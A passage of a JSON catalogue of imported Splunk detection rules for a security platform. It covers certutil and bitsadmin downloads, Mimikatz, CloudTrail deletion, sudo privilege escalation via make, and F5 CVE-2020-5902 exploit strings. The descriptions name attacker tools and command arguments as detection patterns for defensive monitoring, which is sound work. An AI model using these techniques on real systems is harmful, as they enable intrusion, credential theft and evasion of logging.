"splunk-security-content-7f8e2b4c-9a3d-4e1f-8c5b-6d7e8f9a0b1c", "type": "detection", "name": "Cisco Privileged Account Creation with Suspicious SSH Activity", "description": "This analytic detects a correlation between privileged account creation on Cisco IOS devices and subsequent inbound SSH connections to non-standard ports or sshd_operns by correlating risk events\nThis correlation identifies when both \"Cisco IOS Suspicious Privileged Account Creation\" and SSH-related Snort detections (\"SSH Connection to sshd_operns\" or \"SSH Connection to Non-Standard Port\") fire for the same network device.\nThis behavior is highly indicative of persistence establishment following initial compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1136", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-privileged-account-creation-with-suspicious-ssh-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f8e2b4c-9a3d-4e1f-8c5b-6d7e8f9a0b1c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_privileged_account_creation_with_suspicious_ssh_activity.yml" } }, { "id": "splunk-security-content-7fac8d40-e370-45ea-a4a3-031bbcc18b02", "type": "detection", "name": "Windows File Download Via CertUtil", "description": "The following analytic detects the use of `certutil.exe` to download files using the `-URL`, `-urlcache` or '-verifyctl' arguments. This behavior is identified by monitoring command-line executions for these specific arguments via Endpoint Detection and Response (EDR) telemetry. This activity is significant because `certutil.exe` is a legitimate tool often abused by attackers to download and execute malicious payloads. If confirmed malicious, this could allow an attacker to download and execute arbitrary files, potentially leading to code execution, data exfiltration, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-file-download-via-certutil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7fac8d40-e370-45ea-a4a3-031bbcc18b02", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_file_download_via_certutil.yml" } }, { "id": "splunk-security-content-7fb15084-b14e-405a-bd61-a6de15a40722", "type": "detection", "name": "Cloud Instance Modified By Previously Unseen User", "description": "The following analytic identifies cloud instances being modified by users who have not previously modified them. It leverages data from the Change data model, focusing on successful modifications of EC2 instances. This activity is significant because it can indicate unauthorized or suspicious changes by potentially compromised or malicious users. If confirmed malicious, this could lead to unauthorized access, configuration changes, or potential disruption of cloud services, posing a significant risk to the organization's cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cloud-instance-modified-by-previously-unseen-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7fb15084-b14e-405a-bd61-a6de15a40722", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/cloud_instance_modified_by_previously_unseen_user.yml" } }, { "id": "splunk-security-content-7feb7972-7ac3-11eb-bac8-acde48001122", "type": "detection", "name": "Suspicious Scheduled Task from Public Directory", "description": "The following analytic identifies the creation of scheduled tasks that execute binaries or scripts from public directories, such as users\\public, \\programdata\\, or \\windows\\temp, using schtasks.exe with the /create command. It leverages Sysmon Event ID 1 data to detect this behavior. This activity is significant because it often indicates an attempt to maintain persistence or execute malicious scripts, which are common tactics in malware deployment. If confirmed as malicious, this could lead to data compromise, unauthorized access, and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-scheduled-task-from-public-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7feb7972-7ac3-11eb-bac8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_scheduled_task_from_public_directory.yml" } }, { "id": "splunk-security-content-802a0930-0a4a-4451-bf6c-6366c6b6d9e7", "type": "detection", "name": "Windows Global Object Access Audit List Cleared Via Auditpol", "description": "The following analytic identifies the execution of `auditpol.exe` with the \"/resourceSACL\" flag, and either the \"/clear\" or \"/remove\" command-line arguments used to remove or clear the global object access audit policy. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity can be significant as it indicates potential defense evasion by adversaries or Red Teams, aiming to limit data that can be leveraged for detections and audits. If confirmed malicious, this behavior could allow attackers to bypass defenses, and plan further attacks, potentially leading to full machine compromise or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-global-object-access-audit-list-cleared-via-auditpol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "802a0930-0a4a-4451-bf6c-6366c6b6d9e7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_global_object_access_audit_list_cleared_via_auditpol.yml" } }, { "id": "splunk-security-content-80402396-d78a-4c6e-ade5-7697ea670adf", "type": "detection", "name": "Windows SnappyBee Create Test Registry", "description": "The following analytic detects modifications to the Windows registry under `SOFTWARE\\Microsoft\\Test`, a location rarely used by legitimate applications in a production environment. Monitoring this key is crucial, as adversaries may create or alter values here for monitoring update of itself file path, updated configuration file, or system mark compromised. The detection leverages **Sysmon Event ID 13** (Registry Value Set) to identify unauthorized changes. Analysts should investigate processes associated with these modifications, particularly unsigned executables or suspicious command-line activity, as they may indicate malware or unauthorized software behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-snappybee-create-test-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80402396-d78a-4c6e-ade5-7697ea670adf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_snappybee_create_test_registry.yml" } }, { "id": "splunk-security-content-80630ff4-8e4c-11eb-aab5-acde48001122", "type": "detection", "name": "BITSAdmin Download File", "description": "The following analytic detects the use of `bitsadmin.exe` with the `transfer` parameter to download a remote object. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and command-line telemetry. This activity is significant because `bitsadmin.exe` can be exploited to download and execute malicious files without immediate detection. If confirmed malicious, an attacker could use this technique to download and execute payloads, potentially leading to code execution, privilege escalation, or persistent access within the environment. Review parallel and child processes, especially `svchost.exe`, for associated artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bitsadmin-download-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80630ff4-8e4c-11eb-aab5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bitsadmin_download_file.yml" } }, { "id": "splunk-security-content-8085b79b-9b85-4e67-ad63-351c9e9a5e9a", "type": "detection", "name": "Okta Mismatch Between Source and Response for Verify Push Request", "description": "The following analytic identifies discrepancies between the source and response events for Okta Verify Push requests, indicating potential suspicious behavior. It leverages Okta System Log events, specifically `system.push.send_factor_verify_push` and `user.authentication.auth_via_mfa` with the factor \"OKTA_VERIFY_PUSH.\" The detection groups events by SessionID, calculates the ratio of successful sign-ins to push requests, and checks for session roaming and new device/IP usage. This activity is significant as it may indicate push spam or unauthorized access attempts. If confirmed malicious, attackers could bypass MFA, leading to unauthorized access to sensitive systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-mismatch-between-source-and-response-for-verify-push-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8085b79b-9b85-4e67-ad63-351c9e9a5e9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_mismatch_between_source_and_response_for_verify_push_request.yml" } }, { "id": "splunk-security-content-80879283-c30f-44f7-8471-d1381f6d437a", "type": "detection", "name": "GetCurrent User with PowerShell Script Block", "description": "The following analytic detects the execution of the `GetCurrent` method from the WindowsIdentity .NET class using PowerShell Script Block Logging (EventCode=4104). This method identifies the current Windows user. The detection leverages PowerShell script block logs to identify when this method is called. This activity is significant because adversaries and Red Teams may use it to gain situational awareness and perform Active Directory discovery on compromised endpoints. If confirmed malicious, this could allow attackers to map out user accounts and potentially escalate privileges or move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getcurrent-user-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80879283-c30f-44f7-8471-d1381f6d437a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getcurrent_user_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-809b31d2-5462-11eb-ae93-0242ac130002", "type": "detection", "name": "BCDEdit Failure Recovery Modification", "description": "The following analytic detects modifications to the Windows error recovery boot configurations using bcdedit.exe with flags such as \"recoveryenabled\" and \"no\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because ransomware often disables recovery options to prevent system restoration, making it crucial for SOC analysts to investigate. If confirmed malicious, this could hinder recovery efforts, allowing ransomware to cause extensive damage and complicate remediation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/bcdedit-failure-recovery-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "809b31d2-5462-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/bcdedit_failure_recovery_modification.yml" } }, { "id": "splunk-security-content-80b22836-5091-4944-80ee-f733ac443f4f", "type": "detection", "name": "Linux Make Privilege Escalation", "description": "The following analytic detects the use of the 'make' command with elevated privileges to execute system commands as root, potentially leading to a root shell. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include 'make', '--eval', and 'sudo'. This activity is significant because it indicates a possible privilege escalation attempt, allowing a user to gain root access. If confirmed malicious, an attacker could achieve full control over the system, execute arbitrary commands, and compromise the entire environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-make-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80b22836-5091-4944-80ee-f733ac443f4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_make_privilege_escalation.yml" } }, { "id": "splunk-security-content-80b44ae2-60ff-43f1-8e56-34beb49a340a", "type": "detection", "name": "O365 Exfiltration via File Access", "description": "The following analytic detects when an excessive number of files are access from o365 by the same user over a short period of time. A malicious actor may abuse the \"open in app\" functionality of SharePoint through scripted or Graph API based access to evade triggering the FileDownloaded Event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. Additional attention should be take with any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80b44ae2-60ff-43f1-8e56-34beb49a340a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_access.yml" } }, { "id": "splunk-security-content-80f3fc1b-705f-4080-bf08-f61bf013b900", "type": "detection", "name": "O365 Privileged Role Assigned To Service Principal", "description": "The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals. This detection leverages the O365 Universal Audit Log data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-privileged-role-assigned-to-service-principal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80f3fc1b-705f-4080-bf08-f61bf013b900", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_privileged_role_assigned_to_service_principal.yml" } }, { "id": "splunk-security-content-80f9d53e-9ca1-11eb-b0d6-acde48001122", "type": "detection", "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with 30 unique users. It leverages Windows Event 4625 with Logon Type 3, indicating remote authentication attempts. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges in an Active Directory environment. If confirmed malicious, this activity could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information. This detection is crucial for real-time security monitoring and threat hunting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-remotely-failed-to-authenticate-from-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80f9d53e-9ca1-11eb-b0d6-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_remotely_failed_to_authenticate_from_host.yml" } }, { "id": "splunk-security-content-80fcc4d4-fd90-488e-b55a-4e7190ae6ce2", "type": "detection", "name": "Windows Unusual NTLM Authentication Users By Source", "description": "The following analytic detects when an unusual number of NTLM authentications is attempted by the same source. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to a domain joined Windows device using an NTLM based process/attack. This same activity may also generate a large number of EventID 4776 events in as well.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-users-by-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80fcc4d4-fd90-488e-b55a-4e7190ae6ce2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_users_by_source.yml" } }, { "id": "splunk-security-content-80ffaede-1f12-49d5-a86e-b4b599b68b3c", "type": "detection", "name": "Windows Root Domain linked policies Discovery", "description": "The following analytic detects the use of the `[Adsisearcher]` type accelerator in PowerShell to query Active Directory for root domain linked policies. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. This behavior is significant as it may indicate an attempt by adversaries or Red Teams to gain situational awareness and perform Active Directory Discovery. If confirmed malicious, this activity could allow attackers to map out domain policies, potentially aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-root-domain-linked-policies-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "80ffaede-1f12-49d5-a86e-b4b599b68b3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_root_domain_linked_policies_discovery.yml" } }, { "id": "splunk-security-content-810e4dbc-d46e-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect F5 TMUI RCE CVE-2020-5902", "description": "The following analytic identifies remote code execution (RCE) attempts targeting F5 BIG-IP, BIG-IQ, and Traffix SDC devices, specifically exploiting CVE-2020-5902. It uses regex to detect patterns in syslog data that match known exploit strings such as \"hsqldb;\" and directory traversal sequences. This activity is significant because successful exploitation can allow attackers to execute arbitrary commands on the affected devices, leading to full system compromise. If confirmed malicious, this could result in unauthorized access, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-f5-tmui-rce-cve-2020-5902.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "810e4dbc-d46e-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/detect_f5_tmui_rce_cve_2020_5902.yml" } }, { "id": "splunk-security-content-81263de4-160a-11ec-944f-acde48001122", "type": "detection", "name": "Non Chrome Process Accessing Chrome Default Dir", "description": "The following analytic detects a non-Chrome process accessing files in the Chrome user default folder. It leverages Windows Security Event logs, specifically event code 4663, to identify unauthorized access attempts. This activity is significant because the Chrome default folder contains sensitive user data such as login credentials, browsing history, and cookies. If confirmed malicious, this behavior could indicate an attempt to exfiltrate sensitive information, often associated with RATs, trojans, and advanced persistent threats like FIN7. Such access could lead to data theft and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/non-chrome-process-accessing-chrome-default-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81263de4-160a-11ec-944f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/non_chrome_process_accessing_chrome_default_dir.yml" } }, { "id": "splunk-security-content-8148c29c-c952-11eb-9255-acde48001122", "type": "detection", "name": "Detect Mimikatz With PowerShell Script Block Logging", "description": "The following analytic detects the execution of Mimikatz commands via PowerShell by leveraging PowerShell Script Block Logging (EventCode=4104). This method captures and logs the full command sent to PowerShell, allowing for the identification of suspicious activities such as Pass the Ticket, Pass the Hash, and credential dumping. This activity is significant as Mimikatz is a well-known tool used for credential theft and lateral movement. If confirmed malicious, this could lead to unauthorized access, privilege escalation, and potential compromise of sensitive information within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mimikatz-with-powershell-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8148c29c-c952-11eb-9255-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mimikatz_with_powershell_script_block_logging.yml" } }, { "id": "splunk-security-content-8158ccc4-6038-11eb-ae93-0242ac130002", "type": "detection", "name": "O365 Excessive SSO logon errors", "description": "The following analytic detects accounts experiencing a high number of Single Sign-On (SSO) logon errors. It leverages data from the `o365_management_activity` dataset, focusing on failed user login attempts with SSO errors. This activity is significant as it may indicate brute-force attempts or the hijacking/reuse of SSO tokens. If confirmed malicious, attackers could potentially gain unauthorized access to user accounts, leading to data breaches, privilege escalation, or further lateral movement within the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-excessive-sso-logon-errors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8158ccc4-6038-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_excessive_sso_logon_errors.yml" } }, { "id": "splunk-security-content-817a5c89-5b92-4818-a22d-aa35e1361afe", "type": "detection", "name": "Linux Auditd Sudo Or Su Execution", "description": "The following analytic detects the execution of the \"sudo\" or \"su\" command on a Linux operating system. It leverages data from Linux Auditd, focusing on process names and parent process names. This activity is significant because \"sudo\" and \"su\" commands are commonly used by adversaries to elevate privileges, potentially leading to unauthorized access or control over the system. If confirmed malicious, this activity could allow attackers to execute commands with root privileges, leading to severe security breaches, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-sudo-or-su-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "817a5c89-5b92-4818-a22d-aa35e1361afe", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_sudo_or_su_execution.yml" } }, { "id": "splunk-security-content-81a9f2fe-1697-473c-af1d-086b0d8b63c8", "type": "detection", "name": "ASL AWS Create Access Key", "description": "The following analytic identifies the creation of AWS IAM access keys by a user for another user, which can indicate privilege escalation. It leverages AWS CloudTrail logs to detect instances where the user creating the access key is different from the user for whom the key is created. This activity is significant because unauthorized access key creation can allow attackers to establish persistence or exfiltrate data via AWS APIs. If confirmed malicious, this could lead to unauthorized access to AWS services, data exfiltration, and long-term persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-create-access-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81a9f2fe-1697-473c-af1d-086b0d8b63c8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_create_access_key.yml" } }, { "id": "splunk-security-content-81f1dce0-0f18-11ec-a5d7-acde48001122", "type": "detection", "name": "Change To Safe Mode With Network Config", "description": "The following analytic detects the execution of a suspicious `bcdedit` command that configures a host to boot in safe mode with network support. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving `bcdedit.exe` with specific parameters. This activity is significant because it is a known technique used by BlackMatter ransomware to force a compromised host into safe mode for continued encryption. If confirmed malicious, this could allow attackers to bypass certain security controls, persist in the environment, and continue their malicious activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/change-to-safe-mode-with-network-config.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "81f1dce0-0f18-11ec-a5d7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/change_to_safe_mode_with_network_config.yml" } }, { "id": "splunk-security-content-82092925-9ca1-4e06-98b8-85a2d3889552", "type": "detection", "name": "AWS Defense Evasion Delete Cloudtrail", "description": "The following analytic detects the deletion of AWS CloudTrail logs by identifying `DeleteTrail` events within CloudTrail logs. This detection leverages CloudTrail data to monitor for successful `DeleteTrail` actions, excluding those initiated from the AWS console. This activity is significant because adversaries may delete CloudTrail logs to evade detection and operate stealthily within the compromised environment. If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and potentially leading to prolonged unauthorized access and further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-delete-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "82092925-9ca1-4e06-98b8-85a2d3889552", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_delete_cloudtrail.yml" } }, { "id": "splunk-security-content-8230c407-1b47-4d95-ac2e-718bd6381386", "type": "detection", "name": "Linux Auditd Setuid Using Chmod Utility", "description": "The following analytic detects the execution of the chmod utility to set the SUID or SGID bit on files, which can allow users to temporarily gain root or group-level 